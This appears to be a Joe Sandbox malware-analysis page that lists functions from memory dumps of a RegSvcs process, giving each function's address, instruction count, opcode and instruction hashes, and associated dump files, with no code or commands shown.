Instruction ID: 0915a0f6bc1a37007e16cad14169eb7b34bd2a0f8e551955cc1a4b3c921454e3
Opcode Fuzzy Hash: 9b395fef7453d536b78dec007940be39c9c055d2e6198496586ed9f65ce9d980
Instruction Fuzzy Hash: 57A1BF70B41616DBEF25CF69CD90BAAB7B1FF58318F084029EA4597385DB34E852CB90

Function 016560E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0bd0281fb66d8a485abc9c8bc0e815b767ecb3b4f38f6889072721e3d6415d
Instruction ID: 1b290e03713d1c8ece7836d6382cc717c7b0dceb0fe02cba1fe1ece0ed0bdf0b
Opcode Fuzzy Hash: 9d0bd0281fb66d8a485abc9c8bc0e815b767ecb3b4f38f6889072721e3d6415d
Instruction Fuzzy Hash: 98918D71E00216AFDF55CFA8DC84BBEBBB5AF48750F5541A9EA10AB341D734E900CBA0

Function 016063FF Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7352c92ffd99f29d397b49d0f5b7e0836a2762a419b77563461a4e1e7ba3c941
Instruction ID: 08b7e08c2e46199f3e99f26790becc0ab8f9b9ac172502a319dac44364d20d97
Opcode Fuzzy Hash: 7352c92ffd99f29d397b49d0f5b7e0836a2762a419b77563461a4e1e7ba3c941
Instruction Fuzzy Hash: CB911471B013129FEB2ADF58DC46BBB7BA2FF40B14F15801CE9016B381DB60A811C7A9

Function 015EE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26432fdcb01ec42b15c3b24809175f1d73ba58da26f55216bd17372f4190078e
Instruction ID: 74a514a14a6ef6d69e7824782265389216dfce653b7d227f358851a993073f90
Opcode Fuzzy Hash: 26432fdcb01ec42b15c3b24809175f1d73ba58da26f55216bd17372f4190078e
Instruction Fuzzy Hash: 25911131E106168BEB289B69C889B7EBBE2FFD4714F05446AE9059F380E774D901CB51

Function 015E0C00 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0df1f47167e7e5622c9df56e05e04318c2e19ac3585597b709ad887cbdb54d8
Instruction ID: 76e29e4673ddafd9a9ffa3d628b438a0d1d298d897b48e678a230f33e942c8d9
Opcode Fuzzy Hash: f0df1f47167e7e5622c9df56e05e04318c2e19ac3585597b709ad887cbdb54d8
Instruction Fuzzy Hash: 51A1D030B0070A9FD729CF68C884BBABBE5BF54710F14856DE48A8F682D7B5E845C791

Function 016589B3 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9872c3f6c8f8134068ebcae4c0d1412b16a71995a7f3cd7763e00c2b8f5cb542
Instruction ID: 207fe2dfbc1ec9347ce3a6469a04cc8312342e603048b83a447dc3160d4f552d
Opcode Fuzzy Hash: 9872c3f6c8f8134068ebcae4c0d1412b16a71995a7f3cd7763e00c2b8f5cb542
Instruction Fuzzy Hash: 13910E72641706EFD362DF6A8C80B6A77EDBB94B14F04455CFE42AFA81D730A8018795

Function 01604AD0 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f3742934fb74423f43faf31e45618142db7819dfdcd97183d081e5a572b5d3
Instruction ID: 7c8f149ca2fd339a42e925224934f1ff881e35319f71beeee13a0ca84f52829e
Opcode Fuzzy Hash: f4f3742934fb74423f43faf31e45618142db7819dfdcd97183d081e5a572b5d3
Instruction Fuzzy Hash: BD611232641A229FD73B8F1CCC81B6AB7E5BF80B50F14852DEA559B380DB30E841CB95

Function 01626ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5425dc8bc2e27d61f647cc63f5e0cd499f32e65981853e577724db454ac49b
Instruction ID: 31440f532ed7951364678e2456dde0fedb941f25452f87cad1efa879029ec3e9
Opcode Fuzzy Hash: 2a5425dc8bc2e27d61f647cc63f5e0cd499f32e65981853e577724db454ac49b
Instruction Fuzzy Hash: 3F8194B1E0062A9FDB18CF69C940ABEBBF9FB48700F14852EE855D7640E734D951CBA4

Function 015C6D10 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3092fee4a09162d44e37d26848f8a81f481784f38680ca1906803c8acbeaa3d8
Instruction ID: ed152e49ad1ec8c796fd1f5442811789618845b20579e16a3f272f215de33fbd
Opcode Fuzzy Hash: 3092fee4a09162d44e37d26848f8a81f481784f38680ca1906803c8acbeaa3d8
Instruction Fuzzy Hash: 3C717D76604A729BDB21DE29CD80B6AB7E8FFC4358F044929E955DB300E730E9458F92

Function 0160E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8ada9b93440809d021cc3aaf5323cb585d10cff6f1dea22733c2a0cf7e4ae6
Instruction ID: 6e693a6c7a55ee6e3111134e6eb63e35ac8586609eee4cc73f625e4a308b68dd
Opcode Fuzzy Hash: 7c8ada9b93440809d021cc3aaf5323cb585d10cff6f1dea22733c2a0cf7e4ae6
Instruction Fuzzy Hash: 1A814171A006199FDB2ACFA9C880AEFBBBAFF48354F14482DE555A7250D731AC45CB50

Function 015D64AB Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed527654990b4dffdd9946930398d8e9dd9f8f8c434b37fbbb89093d2a2ed435
Instruction ID: f47e02d50df4f761f22b68efab23bda4af12ca11fce554fc2a69c4ccc298e1ce
Opcode Fuzzy Hash: ed527654990b4dffdd9946930398d8e9dd9f8f8c434b37fbbb89093d2a2ed435
Instruction Fuzzy Hash: D271BCB19043059FCB21DF68CC84B9B7BA9BF95764F84086CF9488B24AD734D589CB92

Function 015EC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02de0488333b49506b36aa92bda80bcadd29367679e6cf889b146f3f30ca9527
Instruction ID: 120489422b346606454cbbbd863f23c67711be136b0b8a2d184a375f4f16f381
Opcode Fuzzy Hash: 02de0488333b49506b36aa92bda80bcadd29367679e6cf889b146f3f30ca9527
Instruction Fuzzy Hash: 6C719BB6D046659FCB298F59C9947FEBBF5FF88710F14461AE942AB350D734A800CBA0

Function 0160A660 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4ec1cc4570e9933b1ad01d21ae0fde446ed36034f369640ba5e7efa38b65a8
Instruction ID: 564ff6b549f6eeb40bbbff72a2ce43e164b5c845bf941577b22350874847d338
Opcode Fuzzy Hash: ca4ec1cc4570e9933b1ad01d21ae0fde446ed36034f369640ba5e7efa38b65a8
Instruction Fuzzy Hash: F9716EB5E0021ADFEF28CF9CD9906ADBBB1BF89754F14812EE505AB341E7319941CB60

Function 0165035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f0af9a4cc35be43268488dd58ae78b3cd43133769d1ae5baa3c223ab0f1c10
Instruction ID: 97c5b0e80a9f4434943e3a6c2329cfcb3fd3994e8fa3cf90fbc6dfeb6e09ff21
Opcode Fuzzy Hash: a2f0af9a4cc35be43268488dd58ae78b3cd43133769d1ae5baa3c223ab0f1c10
Instruction Fuzzy Hash: 6A716E71E0060AEFDB54DFA9C984A9EBBF9FF88704F144569E905AB250DB30EA41CB50

Function 015D8AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 901a628bc7a5ed34452805ed916f9ba076b82bf8ea991ce0061757d7a792c2c6
Instruction ID: 7e19fc70f4e4c84d2e1034c1cd942b79917b01cd66c3a08ea57b4b28a1bdcdd4
Opcode Fuzzy Hash: 901a628bc7a5ed34452805ed916f9ba076b82bf8ea991ce0061757d7a792c2c6
Instruction Fuzzy Hash: 8B817A72A043168FEB25CF9CDDA4BAEB7B1BF88314F15912DD910AB285CB749D41CB90

Function 015DA471 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ddad1d2253477368775d650806fbe40ee6b25507935d8f47f39ddfa9d5d1b8a
Instruction ID: 39c96cf31a9eca46f29cd752fc5a19de9a116cc8884ed683a3a1e6f74887b6f6
Opcode Fuzzy Hash: 5ddad1d2253477368775d650806fbe40ee6b25507935d8f47f39ddfa9d5d1b8a
Instruction Fuzzy Hash: 9B7169752083868BDB21CF58C440B6BB7E4FF88704F04892EF986DB255E734DA4ACB56

Function 015E0A5B Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63acb94d11ac50cfd40467455130bf6fa14d6d34458243dfb6c67b6bc904f699
Instruction ID: abcb67c70ba2aaee64b925d5567e17a09c058c4bd3b1c305a175a96bb3539676
Opcode Fuzzy Hash: 63acb94d11ac50cfd40467455130bf6fa14d6d34458243dfb6c67b6bc904f699
Instruction Fuzzy Hash: F8617E70B003069FDB29DF28C844B6ABBE6FF45704F14855DE49A8F292D7B0E881CB95

Function 015CCF50 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db7ced273f109870a3119fbeff8411b08063341be5324f50c129b50302a2ba0
Instruction ID: e47ed9bcef04323fc3df629f06f42c1650bae816f9077ad32b0bfae2329d9d00
Opcode Fuzzy Hash: 5db7ced273f109870a3119fbeff8411b08063341be5324f50c129b50302a2ba0
Instruction Fuzzy Hash: CC714E71550B528FD7325FA9C944B32BBF0BF91BA1F140A2DD9E64BAE1E360A441CF40

Function 015E61D1 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cf188526202708d927d9dbc3a2b5856b3033e6285b960e7c828ca4cd77601b
Instruction ID: f2d6970ae0c2869f97f521788b574aa1cdfff1d80779085076bada10b20c324d
Opcode Fuzzy Hash: e7cf188526202708d927d9dbc3a2b5856b3033e6285b960e7c828ca4cd77601b
Instruction Fuzzy Hash: 99718D34E016268FDB2ACF98C8947ADB7F2BFA4344F14455CD856AF345DB74A942CB80

Function 0164E6F2 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bb3eb8f37c0ffd743bc371efa8aa33a53a3c10d4360eedccc9289f857f66f61
Instruction ID: 7f6933957e709f82713fcef6407b2b793c8fa995afb8d76b83874a451e0ecd4e
Opcode Fuzzy Hash: 4bb3eb8f37c0ffd743bc371efa8aa33a53a3c10d4360eedccc9289f857f66f61
Instruction Fuzzy Hash: 7E614C71E006199FEB15DFA8CC80BAEBBB9FF44700F15446EE649EB251D736A901CB50

Function 015DAC50 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
